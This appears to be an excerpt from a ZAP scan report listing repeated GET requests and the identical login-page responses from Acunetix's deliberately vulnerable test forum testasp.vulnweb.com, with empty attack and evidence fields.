<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 